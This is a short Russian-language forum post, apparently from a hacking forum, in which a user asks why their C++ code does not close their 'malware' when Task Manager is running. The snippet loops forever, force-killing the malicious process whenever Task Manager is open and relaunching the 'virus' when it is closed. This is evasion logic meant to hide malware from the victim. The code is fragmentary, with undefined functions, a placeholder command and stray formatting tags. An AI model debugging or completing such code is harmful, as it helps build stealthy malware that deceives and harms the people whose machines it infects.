Please note, if you want to make a deal with this user, that it is blocked.
Код:
В чем ошибка? Не закрывает зловред, если диспетчер запущен!
C++:
#include <iostream>
#include <string>
#include <urlmon.h>
#include <tchar.h>
#include <Tlhelp32.h>
#include <fstream>
#include <stdlib.h>
#include <fstream>
#include <Windows.h>[/B]
[B]typedef const TCHAR* LPCTSTR;[/B]
[B]using namespace std;[/B]
[B]void prs() {
const wchar_t * process_of_taskmgr = L"Taskmgr.exe";
const wchar_t * process1 = L"xxx.exe";
const char * kill_xxx = "taskkill /F /IM xxx.exe";
const char * startvirus = "|start virus|";
while (true) {
if (isProcessRun(process_of_taskmgr) && isProcessRun(process1)) {
system(kill_xxx);
}
else if (!(isProcessRun(process_of_taskmgr)) && !(isProcessRun(process1))) {
system(startvirus);
}
Sleep(1000);
}
}
Последнее редактирование: